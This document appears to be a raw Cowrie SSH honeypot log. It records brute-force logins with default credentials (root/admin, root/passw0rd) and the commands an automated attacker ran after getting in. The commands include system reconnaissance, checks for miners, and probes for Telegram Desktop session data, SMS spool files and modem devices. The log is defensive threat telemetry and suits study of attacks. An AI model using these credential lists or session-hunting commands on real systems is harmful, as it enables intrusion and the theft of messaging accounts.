{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:48:31.628709Z","src_ip":"212.227.235.229","session":"68fbfa6cb684"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:31.725616Z","src_ip":"212.227.125.160","session":"4889c67a340b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:32.881430Z","src_ip":"212.227.125.160","session":"4889c67a340b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:39.313369Z","src_ip":"212.227.235.229","session":"68fbfa6cb684"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57232,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8f14ebc14b7","protocol":"ssh","message":"New connection: 212.227.125.160:57232 (1.2.3.4:22) [session: f8f14ebc14b7]","sensor":"my-vps","timestamp":"2025-08-31T00:48:41.795133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:41.795936Z","src_ip":"212.227.125.160","session":"f8f14ebc14b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:48:41.869582Z","src_ip":"212.227.125.160","session":"f8f14ebc14b7"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:42.113130Z","src_ip":"212.227.125.160","session":"f8f14ebc14b7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:43.250741Z","src_ip":"212.227.125.160","session":"f8f14ebc14b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43774,"dst_ip":"1.2.3.4","dst_port":22,"session":"cef0d5437b1c","protocol":"ssh","message":"New connection: 212.227.125.160:43774 (1.2.3.4:22) [session: cef0d5437b1c]","sensor":"my-vps","timestamp":"2025-08-31T00:48:49.531509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-31T00:48:49.560248Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-31T00:48:49.721447Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:51.837871Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39298,"dst_ip":"1.2.3.4","dst_port":22,"session":"327935badd86","protocol":"ssh","message":"New connection: 212.227.125.160:39298 (1.2.3.4:22) [session: 327935badd86]","sensor":"my-vps","timestamp":"2025-08-31T00:48:52.281522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:52.282504Z","src_ip":"212.227.125.160","session":"327935badd86"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:48:52.356400Z","src_ip":"212.227.125.160","session":"327935badd86"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:52.635640Z","src_ip":"212.227.125.160","session":"327935badd86"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:48:53.002915Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:53.346925Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-31T00:48:53.347619Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-31T00:48:53.348076Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:53.512760Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:53.764484Z","src_ip":"212.227.125.160","session":"327935badd86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:54.365676Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-31T00:48:54.366389Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:54.530331Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:54.881043Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T00:48:54.881712Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:55.049725Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:55.437480Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-31T00:48:55.438218Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:55.607779Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:56.013464Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-31T00:48:56.014174Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:56.186852Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:56.618302Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-31T00:48:56.619023Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:56.793822Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:57.192179Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-31T00:48:57.193043Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:57.380612Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:58.180686Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-31T00:48:58.181480Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:58.389814Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:58.738651Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-31T00:48:58.739221Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:58.917859Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58358,"dst_ip":"1.2.3.4","dst_port":22,"session":"6afe017f3cc9","protocol":"ssh","message":"New connection: 212.227.125.160:58358 (1.2.3.4:22) [session: 6afe017f3cc9]","sensor":"my-vps","timestamp":"2025-08-31T00:49:01.397797Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41790,"dst_ip":"1.2.3.4","dst_port":22,"session":"b505df0921a1","protocol":"ssh","message":"New connection: 212.227.125.160:41790 (1.2.3.4:22) [session: b505df0921a1]","sensor":"my-vps","timestamp":"2025-08-31T00:49:02.700310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:02.701513Z","src_ip":"212.227.125.160","session":"b505df0921a1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:02.775097Z","src_ip":"212.227.125.160","session":"b505df0921a1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:02.924256Z","src_ip":"212.227.125.160","session":"6afe017f3cc9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:02.925052Z","src_ip":"212.227.125.160","session":"6afe017f3cc9"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:49:03.001308Z","src_ip":"212.227.125.160","session":"b505df0921a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:49:03.391819Z","src_ip":"212.227.125.160","session":"b505df0921a1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:49:03.392306Z","src_ip":"212.227.125.160","session":"b505df0921a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:03.474739Z","src_ip":"212.227.125.160","session":"b505df0921a1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:03.475934Z","src_ip":"212.227.125.160","session":"b505df0921a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53580,"dst_ip":"1.2.3.4","dst_port":22,"session":"484a83e508ea","protocol":"ssh","message":"New connection: 212.227.235.229:53580 (1.2.3.4:22) [session: 484a83e508ea]","sensor":"my-vps","timestamp":"2025-08-31T00:49:04.757159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:05.753724Z","src_ip":"212.227.235.229","session":"484a83e508ea"}
